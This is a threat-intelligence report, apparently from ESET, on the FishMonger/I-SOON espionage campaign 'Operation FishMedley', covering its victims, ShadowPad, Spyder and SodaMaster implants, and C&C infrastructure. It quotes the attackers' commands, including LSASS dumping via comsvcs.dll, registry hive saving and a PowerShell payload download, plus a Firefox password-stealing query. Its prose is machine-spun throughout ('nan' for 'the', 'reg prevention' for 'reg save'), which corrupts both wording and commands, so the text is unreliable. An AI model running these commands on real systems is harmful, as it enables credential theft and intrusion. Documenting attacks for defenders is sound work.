Operation Fishmedley

On March 5th, 2025, nan US DOJ unsealed an indictment against labor of nan Chinese contractor I‑SOON for their engagement successful aggregate world espionage operations. Those see attacks that we antecedently documented and attributed to nan FishMonger APT group – I‑SOON’s operational limb – including nan discuss of 7 organizations that we identified arsenic being targeted successful a 2022 run that we named Operation FishMedley.

Key points of this blogpost:

• Verticals targeted during Operation FishMedley see governments, NGOs, and deliberation tanks, crossed Asia, Europe, and nan United States.
• Operators utilized implants – specified arsenic ShadowPad, SodaMaster, and Spyder – that are communal aliases exclusive to China-aligned threat actors.
• We measure pinch precocious assurance that Operation FishMedley was conducted by nan FishMonger APT group.
• Independent of nan DOJ indictment, we wished that FishMonger is operated by I‑SOON.

FishMonger profile

FishMonger – a group believed to beryllium operated by nan Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity Report) – falls nether nan Winnti Group umbrella and is astir apt operating retired of China, from nan metropolis of Chengdu wherever I‑SOON’s agency was located. FishMonger is besides known arsenic Earth Lusca, TAG‑22, Aquatic Panda, aliases Red Dev 10. We published an study of this group successful early 2020 erstwhile it heavy targeted universities successful Hong Kong during nan civic protests that started successful June 2019. We initially attributed nan incident to Winnti Group but person since revised our attribution to FishMonger.

The group is known to run watering-hole attacks, arsenic reported by Trend Micro. FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and nan BIOPASS RAT.

Overview

On March 5th, 2025, nan US Department of Justice published a press release and unsealed an indictment against I‑SOON labor and officers of China’s Ministry of Public Security progressive successful aggregate espionage campaigns from 2016 to 2023. The FBI besides added those named successful nan indictment to its “most wanted” list and published a poster, arsenic seen successful Figure 1.

The indictment describes respective attacks that are powerfully related to what we published successful a private APT intelligence report successful early 2023. In this blogpost, we stock our method knowledge astir this world run that targeted governments, NGOs, and deliberation tanks crossed Asia, Europe, and nan United States. We judge that this accusation complements nan precocious published indictment.

During 2022, we investigated respective compromises wherever implants specified arsenic ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were capable to cluster 7 independent incidents for this blogpost and person named that run Operation FishMedley.

FishMonger and I-SOON

During our research, we were capable to independently find that FishMonger is an espionage squad operated by I‑SOON, a Chinese contractor based successful Chengdu that suffered an infamous archive leak successful 2024 – spot this broad study from Harfang Labs.

Victimology

Table 1 shows specifications astir nan 7 victims we identified. The verticals and countries are diverse, but astir are of evident liking to nan Chinese government.

Table 1. Victimology details

Table 2 summarizes nan implants utilized during each intrusion of Operation FishMedley.

Table 2. Details of nan implants utilized against each victim

Technical analysis

Initial access

We were incapable to place nan first discuss vectors. For astir cases, nan attackers seemed to person had privileged entree wrong nan section network, specified arsenic domain administrator credentials.

At Victim D, nan attackers gained entree to an admin console and utilized it to deploy implants connected different machines successful nan section network. It is probable that they first compromised nan instrumentality of a sysadmin aliases information expert and past stole credentials that allowed them to link to nan console.

At Victim F, nan implants were delivered utilizing Impacket, which intends that nan attackers someway antecedently compromised a high-privilege domain account.

Lateral movement

At Victim F, nan operators besides utilized Impacket to move laterally. They gathered accusation connected different section machines and installed implants.

Table 3 shows that nan operators first did immoderate manual reconnaissance utilizing quser.exe, wmic.exe, and ipconfig.exe. Then they tried to get credentials and different secrets by dumping nan section information authority subsystem work (LSASS) process (PID 944). The PID of nan process was obtained via tasklist /svc and nan dump was performed utilizing comsvcs.dll, which is simply a known living-off-the-land binary (LOLBIN). Note that it is apt that nan attackers executed quser.exe to spot whether different users aliases admins were besides logged in, meaning privileged accesses were coming successful LSASS. According to Microsoft documentation, to usage this bid nan attacker must person Full Control support aliases typical entree permission.

They besides saved nan registry hives sam.hive and system.hive, which tin some incorporate secrets aliases credentials.

Finally, they tried to dump nan LSASS process again, utilizing a for loop iterating complete nan output from tasklist.exe. We person seen this aforesaid codification utilized connected different machines, truthful it is simply a bully thought to artifact aliases astatine slightest alert connected it.

Table 3. Commands executed via Impacket connected a instrumentality astatine Victim F

Timestamp (UTC)	Command
2022-06-21 07:34:07	quser
2022-06-21 14:41:23	wmic os get lastbootuptime
2022-06-21 14:41:23	ipconfig /all
2022-06-21 14:41:23	tasklist /svc
2022-06-21 14:41:23	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "C:\Windows\System32\rundll32 C:\windows\system32\comsvcs.dll, MiniDump 944 c:\users\public\music\temp.tmp full"
2022-06-21 14:41:23	reg prevention hklm\sam C:\users\public\music\sam.hive
2022-06-21 14:41:23	reg prevention hklm\system C:\users\public\music\system.hive
2022-06-21 14:41:23	net user
2022-06-22 07:05:37	tasklist /v
2022-06-22 07:07:33	dir c:\users
2022-06-22 09:47:52	for /f "tokens=1,2 delims= " ^%A successful ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\YDWS6P.xml full

Toolset

ShadowPad

ShadowPad is simply a well-known and privately sold modular backdoor, known to only beryllium supplied to China-aligned APT groups, including FishMonger and SparklingGoblin, arsenic documented by SentinelOne. In Operation FishMedley, nan attackers utilized a ShadowPad type packed pinch ScatterBee.

At Victim D, nan loader was downloaded utilizing nan pursuing PowerShell command:

powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")

This shows that nan attackers compromised a web server astatine nan victim’s statement to usage it arsenic a staging server for their malware.

At Victim F, Firefox was utilized to download nan loader, from http://5.188.230[.]47/log.dll. We don’t cognize whether attackers had interactive entree to nan machine, whether different portion of malware was moving successful nan Firefox process, aliases whether nan unfortunate was redirected to nan download page, opportunity via a watering-hole attack.

log.dll is side-loaded by an aged Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a record named log.dll.dat, which tin beryllium decrypted utilizing nan scripts provided successful PwC’s GitHub repository.

We did not retrieve nan log.dll.dat from nan victim’s machine, but we recovered a clone Adobe Flash installer connected VirusTotal pinch nan identical log.dll file. The configuration of nan ShadowPad payload is provided successful Table 4.

Table 4. ShadowPad configuration

Note that from March 20th, 2022 to November 2nd, 2022, nan C&C domain resolved to 213.59.118[.]124, which is mentioned successful a VMware blogpost astir ShadowPad.

Spyder

At Victim D, we detected different backdoor typically utilized by FishMonger: Spyder, a modular implant that was analyzed successful awesome item by Dr.Web.

A Spyder loader was downloaded from http://<a_victim’s_web_server_IP_address>/Images/menu/aa.doc and dropped to C:\Users\Public\task.exe astir 18 hours aft ShadowPad was installed.

The loader – spot Figure 2; sounds nan record c:\windows\temp\guid.dat and decrypts its contents utilizing AES-CBC. The encryption cardinal is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. The initialization vector (IV) is nan first 8 bytes of nan key. Unfortunately, we were incapable to retrieve nan guid.dat file.

Then, nan loader injects nan decoded contented – apt shellcode – into itself (task.exe process) arsenic seen successful Figure 3.

Despite not obtaining nan encrypted last payload, our merchandise did observe a Spyder payload successful representation and it was almost identical to nan Spyder version documented by Dr.Web. The C&C server was hardcoded to 61.238.103[.]165.

Interestingly, aggregate subdomains of junlper[.]com, a known Spyder C&C domain and a anemic homoglyph domain to juniper.net, resolved to 61.238.103[.]165 successful 2022.

A self-signed TLS certificate was coming connected larboard 443 of nan server from May to December 2022, pinch nan thumbprint 89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is simply a certificate utilized by FishMonger for its C&C servers.

SodaMaster

SodaMaster is simply a backdoor that was documented by Kaspersky successful 2021. APT10 was nan first group known to person entree to this backdoor but Operation FishMedley indicates that it whitethorn now beryllium shared among aggregate China-aligned APT groups.

SodaMaster tin only beryllium recovered decrypted successful representation and that’s wherever we detected it. Even though we did not retrieve nan afloat loading chain, we person identified a fewer samples that are nan first measurement of nan chain.

SodaMaster loaders

We recovered six different malicious DLLs that are abusing morganatic executables via DLL side-loading. They each instrumentality nan aforesaid decryption and injection routine.

First, nan loader sounds a hardcoded file, for illustration debug.png, and XOR decrypts it utilizing a hardcoded 239-byte key. Table 5 summarizes nan different loaders. Note that nan XOR cardinal is besides different successful each sample, but excessively agelong to beryllium included successful nan table. Also statement that we did not retrieve immoderate of these encrypted payloads.

Table 5. SodaMaster loaders

Then, nan decrypted buffer is injected into a recently created, suspended svchost.exe process – spot Figure 4.

Finally, nan shellcode is executed utilizing either CreateRemoteThread (on Windows XP aliases older versions) or, connected newer Windows versions, via NtCreateThreadEx arsenic shown successful Figure 5.

The past 4 loaders successful Table 5 person further features:

• They person an export named getAllAuthData that implements a password stealer for Firefox. It sounds nan Firefox SQLite database and runs nan query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins.
• The past 3 loaders persist arsenic a work named Netlock, MsKeyboardFiltersrv, and downmap, respectively.

SodaMaster payload

As mentioned above, nan SodaMaster payload was publically analyzed by Kaspersky and nan samples we’ve recovered don’t look to person evolved much. They still instrumentality nan aforesaid 4 backdoor commands (d, f, l, and s) that were coming successful 2021.

Table 6 shows nan configurations from nan 4 different SodaMaster payloads that we identified. Operators utilized a different C&C server per victim, but we tin spot that Victims B and C stock nan aforesaid hardcoded RSA key.

Table 6. SodaMaster configuration

Victim	C&C server	RSA key
B	162.33.178[.]23	MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
C	78.141.202[.]70	MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
F	192.46.223[.]211	MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE=
G	168.100.10[.]136	MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE=

RPipeCommander

At Victim D, we captured a antecedently chartless implant successful nan aforesaid process wherever Spyder was running. It was astir apt loaded from disk aliases downloaded by Spyder. Because its DLL export sanction was rcmd64.dll, we named this implant RPipeCommander.

RPipeCommander is multithreaded and uses IoCompletionPort to negociate nan I/O requests of nan aggregate threads. It creates nan named tube \\.\Pipe\CmdPipe<PID>, wherever <PID> is nan existent process ID, and sounds from and writes into this pipe.

RPipeCommander is simply a reverse ammunition that accepts 3 commands via nan named pipe:

• h (0x68): create a cmd.exe process and hindrance pipes to nan process to nonstop commands and publication nan output.
• i (0x69): Write a bid successful nan existing cmd.exe process aliases publication nan output of nan erstwhile command.
• j (0x6A): exit nan cmd.exe process by penning exit\r\n successful nan bid shell.

Note that it seems we only person nan server broadside of RPipeCommander. It is apt that a 2nd component, a client, is utilized to nonstop commands to nan server from different instrumentality connected nan section network.

Finally, RPipeCommander is written successful C++ and RTTI accusation was included successful nan captured samples, allowing america to get immoderate of nan people names:

• CPipeServer
• CPipeBuffer
• CPipeSrvEvent
• CPipeServerEventHandler

Other tools

In summation to nan main implants described above, nan attackers utilized a fewer further devices to cod aliases exfiltrate data, which we picture successful Table 7.

Table 7. Other devices utilized during Operation FishMedley

Conclusion

In this blogpost, we person shown really FishMonger conducted a run against high-profile entities each astir nan world and was nan taxable of a US DOJ indictment successful March 2025. We besides showed that nan group is not awkward astir reusing well-known implants, specified arsenic ShadowPad aliases SodaMaster, moreover agelong aft they person been publically described. Finally, we person independently confirmed that FishMonger is simply a squad that is portion of nan Chinese institution I‑SOON.

For immoderate inquiries astir our investigation published connected WeLiveSecurity, please interaction america astatine threatintel@eset.com. 

ESET Research offers backstage APT intelligence reports and information feeds. For immoderate inquiries astir this service, sojourn nan ESET Threat Intelligence page.

IoCs

A broad database of indicators of discuss (IoCs) and samples tin beryllium recovered successful our GitHub repository.

Files

Network

MITRE ATT&CK techniques

This array was built utilizing version 16 of nan MITRE ATT&CK framework.